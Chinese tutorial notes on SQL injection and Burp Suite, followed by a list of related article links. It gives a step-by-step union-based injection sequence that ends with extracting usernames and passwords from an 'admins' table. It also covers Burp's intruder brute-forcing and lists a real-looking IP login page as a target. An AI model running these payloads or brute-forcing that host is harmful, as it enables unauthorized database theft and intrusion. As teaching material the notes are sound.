SQL注入与burPsuit工具介绍
sql注入原理
- 原理:用户输入不可控,用户输入导致了sql语义发生了改变
- 用户输入不可控:网站不能控制普通用户的输入
- sql语义发生变化:
- 动态网页介绍:
- 网站数据请求
- 脚本语言:解释类语言,如,后端语言php/jsp/asp/aspx
- URL的构成
- 数据请求的方式
- GET:随着URL传输,传输数据量较小,不能传输铭感信息
- POST:在请求正文中传输,传输的数据量较大,可传输任何信息
- sql注入的类型
- 按数据类型分
- 字符型
- 数字型
- 安数据传输方式分
- GET型
- POST型
- 按数据类型分
- sql注入发生的位置:
- 演示网站
- 原理:用户输入不可控,用户输入导致了sql语义发生了改变
回显注入
回显注入的原理
sql注入后的结果会出现到网页页面上。
核心点就是union
sql语言回顾
增
- INSERT INTO table_name VALUES (value1,value2,value3,...);
- INSERT INTO table_name (column1,column2,column3,...) VALUES (value1,value2,value3,...);
删 DELETE FROM Websites WHERE name='Facebook' AND country='USA';
改
UPDATE table_name SET column1=value1,column2=value2,... WHERE some_column=some_value;
查
回显注入的流程
- 找数据输入点
- 找有数据输出
- 判断注入类型 使用单双引号、注释符判断
- 确认漏洞是否存在:1' or 1=1 和1' or 1=2
- 判断列数 1' order by 1
- 判断回显位置 0' union select 1
- 找当前数据库 0' union select database()
- 找所有数据库名0' union select group_concat(schema_name) from information_schema.schemata
- 找所有的表名:0' union select group_concat(table_name) from information_schema.tables where table_schema='grade'
- 找所有字段名:0' union select group_concat(column_name) from information_schema.columns where table_schema='grade' and table_name='admins'
- 获取数据:0' union select group_concat(username,'~',password) from admins
特殊的库表
- 数据库的结构:库--->表--->字段(列名)--->数据。
- 特殊库:information_schema----->整个DBMS数据库信息
- schemata--->存有所有的库名 schema_name
- tables------->存有所有表的信息 table_schema 库 table_name 表
- columns---->存有所有字段的信息 table_schema 库 table_name 表 column_name 字段
burpsuite
burpsuite的安装
burpsuite的功能介绍
专业版含有漏洞扫描的功能,社区版没有此功能
- 破解版不能保证自身电脑的安全型
核心功能:拦截数据包,并且篡改数据包
proxy:拦截数据包
forward:提交数据包
drop:丢弃数据包---数据包不会到达服务器
intercept:选择burpsuite的工作状态
- on:处于拦截状态
- off:处于不抓包状态----数据包直接提交到服务器
action:调用数据包处理工具
数据包状态
raw:完整的数据包
params:传输的数据
header:请求数据用表格的形式展示
hex:16进制展示底层数据。
HTTP history
- 展示拦截数据包的历史信息。
options:
proxy listeners:选择代理连接信息
- add:添加代理信息
- edit:编辑,修改代理信息,选中需要修改的代理条目------>点击edit----->弹框中修改IP或端口
- remove:删除代理信息,选中需删除的代理条目---->点击remove
intercept server response
作用:开启或关闭响应拦截状态
repeater
- 作用:数据包重放。
- 用处:
- 重放攻击
- sql注入\文件上传\XSS等绕过
intruder
作用是暴力破解
target展示出的是请求的服务的信息
positsions:选择暴力破解的点于破解方式
- sniper:破解一个地方
- Nattering ram:可破解多个地方,但破解的点数据一样
- pitch fork:可破解多个相关性的点
- cluster bomb:可破解多个点,且多个点之间没有任何联系
payloads:设置字典
payload sets:选择为那一个破解点设置字典
payload options:放置字典
- paste
- load:加载字典文件
- remove:删除字典条目
- clear:删除全部字典数据
- add:手工添加字典
啊实打实
burpsuite数据包操作
开代理
firefox开代理:菜单--->选项--->高级--->网络--->连接--->设置---->手动配置代理
(浏览的代理于burpsuite中设定的代理的ip源端口要一样)
阿斯顿
大苏打
burpsuite暴力破解
暴力破解的原理
- 枚举-----试一试
- 简单---原理操作简单
暴力破解的操作。
- 安装插件:extender--->Bapp store--->install
暴力破解的难点
- 效率低
- 对有效字典的要求较高
- 对算法要求较高
- 对设备要求较高
暴力破解优化
- 信息收集---社工:http://221.237.108.18:8090/tyjgl/login.jsp#
- 多线程
SQL注入与burPsuit工具介绍的更多相关文章
- RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具
无事早上就去逛freebuf看到一款不错的工具,打算介绍给大家 RED_HAWK:基于PHP实现的信息收集与SQL注入漏洞扫描工具 RED HAWK 最新版本:v1.0.0[2017年6月11日] 下 ...
- SQL注入之常用工具sqlmap
通常来说,验证一个页面是否存在注入漏洞比较简单,而要获取数据,扩大权限,则要输入很复杂的SQL语句,有时候我们还会对大量的URL进行测试,这时就需要用到工具来帮助我们进行注入了. 目前流行的注入工具有 ...
- [W3bsafe]分享一个爬SQL注入漏洞的工具
分享一个爬SQL注入的工具 本文转自:i春秋社区由团队核心成员若间开发把工具放到E盘的一个文件夹 他会自动生成一个文本文件 Result.txt 最大页数 自己想弄填多少就填多少关键词 注入点关键词 ...
- web安全之SQL注入--第一章 课程介绍
课程介绍1.什么是SQL注入?2.如何寻找SQL注入漏洞?3.如何进行sql注入攻击?4.如何预防sql注入5.课程总结
- [初学Python]编写一个最简单判断SQL注入的检测工具
0x01 背景 15年那会,几乎可以说是渗透最火的一年,各种教程各种文章,本人也是有幸在那几年学到了一些皮毛,中间因学业问题将其荒废至今.当初最早学的便是,and 1=1 和 and 1=2 这最简单 ...
- SQLiScanner:又一款基于SQLMAP和Charles的被动SQL 注入漏洞扫描工具
https://blog.csdn.net/qq_27446553/article/details/52610095
- 防止sql注入和sqlmap介绍
sql注入问题从WEB诞生到现在也一直没停过,各种大小公司都出现过sql注入问题,导致被拖库,然后存在社工库撞库等一系列影响. 防止sql注入个人理解最主要的就一点,那就是变量全部参数化,能根本的解决 ...
- 一、JDBC的概述 二、通过JDBC实现对数据的CRUD操作 三、封装JDBC访问数据的工具类 四、通过JDBC实现登陆和注册 五、防止SQL注入
一.JDBC的概述###<1>概念 JDBC:java database connection ,java数据库连接技术 是java内部提供的一套操作数据库的接口(面向接口编程),实现对数 ...
- SQL注入—我是如何一步步攻破一家互联网公司的
最近在研究Web安全相关的知识,特别是SQL注入类的相关知识.接触了一些与SQL注入相关的工具.周末在家闲着无聊,想把平时学的东东结合起来攻击一下身边某个小伙伴去的公司,看看能不能得逞.不试不知道,一 ...
随机推荐
- 安装MySQL详细说明
安装MySQL详细说明 下载后得到zip压缩包 解压到自己的安装目录 添加环境变量 我的电脑->属性->高级->环境变量 选择PATH,在其后面添加:你的mysql安装文件下面的bi ...
- .net core 响应的json数据驼峰显示问题。
在.net core webapi中,默认响应的json数据是以驼峰显示的,即首字母小写的方式.如果让其正常显示,只需要在全局配置即可.代码如下图: 配置之后,响应数据就不会再以驼峰的形式展示了.而是 ...
- Golang语言系列-04-运算符
运算符 Go语言内置的运算符有 算术运算符 关系运算符 逻辑运算符 位运算符 赋值运算符 算术运算符 package main import "fmt" func main() { ...
- netty系列之:netty中的懒人编码解码器
目录 简介 netty中的内置编码器 使用codec要注意的问题 netty内置的基本codec base64 bytes compression json marshalling protobuf ...
- How to build your custom release bazel version?
一般情况下用源代码编译,生成的都是开发版本,这种版本做版本号校验方面会有很多问题,所以需要编译自己的release版本. export USE_BAZEL_VERSION=1.2.1 # 选择使用版本 ...
- Django 模版语法 测试环境 ORM单表查询
模版语法 传值 视图函数向前端html页面传值,基本上所有的数据类型都可以渲染在前端页面上. views.py from django.shortcuts import render, redirec ...
- Spring系列之多个数据源配置
前言 在上篇文章讲到了如何配置单数据源,但是在实际场景中,会有需要配置多个数据源的场景,比如说,我们在支付系统中,单笔操作(包含查询.插入.新增)中需要操作主库,在批量查询或者对账单查询等对实时性要求 ...
- SpringSession(redis)
pom.xml <?xml version="1.0" encoding="UTF-8"?> <project xmlns="htt ...
- protected访问权限
Java中protected方法访问权限的问题 protected 修饰的成员变量或方法,只能在同包或子类可访问; package 1 public class TestPackage { prote ...
- SpringCloud升级之路2020.0.x版-24.测试Spring Cloud LoadBalancer
本系列代码地址:https://github.com/HashZhang/spring-cloud-scaffold/tree/master/spring-cloud-iiford 通过单元测试,我们 ...